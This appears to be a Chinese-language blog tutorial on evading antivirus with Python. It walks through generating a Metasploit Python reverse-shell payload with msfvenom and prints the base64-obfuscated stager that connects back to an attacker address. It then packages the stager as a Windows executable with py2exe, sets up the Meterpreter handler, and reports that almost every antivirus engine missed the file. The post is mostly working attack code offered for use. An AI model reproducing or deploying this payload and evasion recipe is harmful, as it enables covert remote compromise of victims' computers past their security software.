使用Python进行防病毒免杀


很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?
打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。


0x01 环境准备


1、软件安装

1
2
Python <SPAN style="COLOR: #008080" class=hljs-number>2.7</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.16</SPAN> x86:https://www.python.org/ftp/python/<SPAN style="COLOR: #008080" class=hljs-number>2.7</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.16</SPAN>/python-<SPAN style="COLOR: #008080" class=hljs-number>2.7</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.16</SPAN>.msi
Py2exe <SPAN style="COLOR: #008080" class=hljs-number>32</SPAN>位:https://sourceforge.net/projects/py2exe/files/py2exe/<SPAN style="COLOR: #008080" class=hljs-number>0.6</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.9</SPAN>/py2exe-<SPAN style="COLOR: #008080" class=hljs-number>0.6</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.9</SPAN>.win32-py2<SPAN style="COLOR: #008080" class=hljs-number>.7</SPAN>.exe/download

2、msfvenom生成Python Payload

1
msfvenom -p python/meterpreter/reverse_tcp LHOST=<SPAN style="COLOR: #008080" class=hljs-number>192.168</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.28</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.128</SPAN> LPORT=<SPAN style="COLOR: #008080" class=hljs-number>443</SPAN> -f raw -o /var/www/html/evil.py



evil.py 代码如下:

1
<SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>import</SPAN> base64,sys;exec(base64.b64decode({<SPAN style="COLOR: #008080" class=hljs-number>2</SPAN>:str,<SPAN style="COLOR: #008080" class=hljs-number>3</SPAN>:<SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>lambda</SPAN> b:bytes(b,<SPAN style="COLOR: #dd1144" class=hljs-string>'UTF-8'</SPAN>)}[sys.version_info[<SPAN style="COLOR: #008080" class=hljs-number>0</SPAN>]](<SPAN style="COLOR: #dd1144" class=hljs-string>'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK'</SPAN>)))

0x02 py2exe 打包Python程序


将evil.py复制到windows,同时创建一个setup.py文件:

1
2
3
4
5
6
7
8
9
10
<SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>from</SPAN> distutils.core <SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>import</SPAN> setup
<SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>import</SPAN> py2exe
setup(
name = <SPAN style="COLOR: #dd1144" class=hljs-string>'Meter'</SPAN>,
description = <SPAN style="COLOR: #dd1144" class=hljs-string>'Python-based App'</SPAN>,
version = <SPAN style="COLOR: #dd1144" class=hljs-string>'1.0'</SPAN>,
console=[<SPAN style="COLOR: #dd1144" class=hljs-string>'evil.py'</SPAN>],
options = {<SPAN style="COLOR: #dd1144" class=hljs-string>'py2exe'</SPAN>: {<SPAN style="COLOR: #dd1144" class=hljs-string>'bundle_files'</SPAN>: <SPAN style="COLOR: #008080" class=hljs-number>1</SPAN>,<SPAN style="COLOR: #dd1144" class=hljs-string>'packages'</SPAN>:<SPAN style="COLOR: #dd1144" class=hljs-string>'ctypes'</SPAN>,<SPAN style="COLOR: #dd1144" class=hljs-string>'includes'</SPAN>: <SPAN style="COLOR: #dd1144" class=hljs-string>'base64,sys,socket,struct,time,code,platform,getpass,shutil'</SPAN>,}},
zipfile = <SPAN style="COLOR: #333333; FONT-WEIGHT: bold" class=hljs-keyword>None</SPAN>,
)

下面的方法运行 evil.py,生成可执行文件。

1
python ./setup.py py2exe



0x03 设置监听端口


Kali 运行Metasploit,设置监听:

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST <SPAN style="COLOR: #008080" class=hljs-number>192.168</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.28</SPAN><SPAN style="COLOR: #008080" class=hljs-number>.128</SPAN>
set LPORT <SPAN style="COLOR: #008080" class=hljs-number>443</SPAN>
run

在Windows中运行evil.exe,获得一个meterpreter的会话



0x04 免杀验证


确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎
扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

1
网站地址:http://www.virscan.org



参考文章:
https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1


?